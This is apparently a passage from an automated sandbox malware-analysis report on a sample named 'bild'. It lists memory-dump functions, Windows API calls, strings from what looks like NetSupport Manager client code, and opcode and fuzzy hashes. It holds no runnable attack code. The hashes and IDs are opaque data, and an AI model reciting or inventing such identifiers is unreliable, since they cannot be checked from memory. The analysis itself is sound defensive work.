                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                              • API String ID: 175691280-2052047905
                                                                                                              • Opcode ID: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                                              • Instruction ID: 95fe0cd820de1796fd70713afb7a02e85a0165c228f84a05359d3cb2f5b90ec5
                                                                                                              • Opcode Fuzzy Hash: 7dd045176ee68b653aa13a97f0e759d1521d44633953b37ee1248efe406da090
                                                                                                              • Instruction Fuzzy Hash: 4FF0A47AA0025CBBCB00DEA5DD40BEEFBBD9B45248F044199E608A7140DE706A45C7A5
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,11026ED0,00000000,00000000,00000000), ref: 110291BE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread__wcstoi64
                                                                                                              • String ID: *TapiFixPeriod$Bridge
                                                                                                              • API String ID: 1152747075-2058455932
                                                                                                              • Opcode ID: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                                              • Instruction ID: bf80e38bc05b38b2fab7e3f27e0d367de778c9bee9065702c43ca09430eaf323
                                                                                                              • Opcode Fuzzy Hash: 455249c5f577f5bc371cc96f4979fefb060ee84a49910c717fadbdf2b24322f5
                                                                                                              • Instruction Fuzzy Hash: 60F0E57074532D7EFB11DAD6CC45F79B6989300B08FA0003DF528551C8E6B1B9008766
                                                                                                              APIs
                                                                                                              • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              • m_hWnd, xrefs: 11001096
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 2046328329-2830328467
                                                                                                              • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                                              • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                                              • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                                              • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                                              APIs
                                                                                                              • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              • m_hWnd, xrefs: 11001056
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 819365019-2830328467
                                                                                                              • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                                              • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                                              • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                                              • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                                              APIs
                                                                                                              • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              • m_hWnd, xrefs: 110010E6
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 906220102-2830328467
                                                                                                              • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                                              • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                                              • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                                              • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              • m_hWnd, xrefs: 11001126
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 1604732272-2830328467
                                                                                                              • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                              • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                                              • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                              • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                                              APIs
                                                                                                              • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              • m_hWnd, xrefs: 11001016
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                              • API String ID: 2229609774-2830328467
                                                                                                              • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                              • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                                              • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                              • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _strncpy
                                                                                                              • String ID: 1000,50$1000,50
                                                                                                              • API String ID: 2961919466-2776873633
                                                                                                              • Opcode ID: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                              • Instruction ID: bd0c201b9adf6a5d857793fbf3440ac1f90bcd045974f847078f01ed738f2ada
                                                                                                              • Opcode Fuzzy Hash: 81d6864d565fa8250d3fb3330302d5ba6346bad85999c22dbebb076b7baf886a
                                                                                                              • Instruction Fuzzy Hash: 7ED0A7706883996FE7008E69EC00B5DBBCC6B01E14F408021FC98CB780DB70F9508351
                                                                                                              APIs
                                                                                                              • SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                              • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                              • API String ID: 2400454052-4183089485
                                                                                                              • Opcode ID: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                              • Instruction ID: 9b03986313e8994d60ed52ed66d1c026156e8c3194449c112131b18896cf505e
                                                                                                              • Opcode Fuzzy Hash: 41d0f825f3bbd18f317b206de87baf67605da20620eb9fcb5cb917e3173e7c4c
                                                                                                              • Instruction Fuzzy Hash: EDD0223AE142369FD2A09BA8AC06FC2F3B49B08318F018438F00096080DAB0B445CB88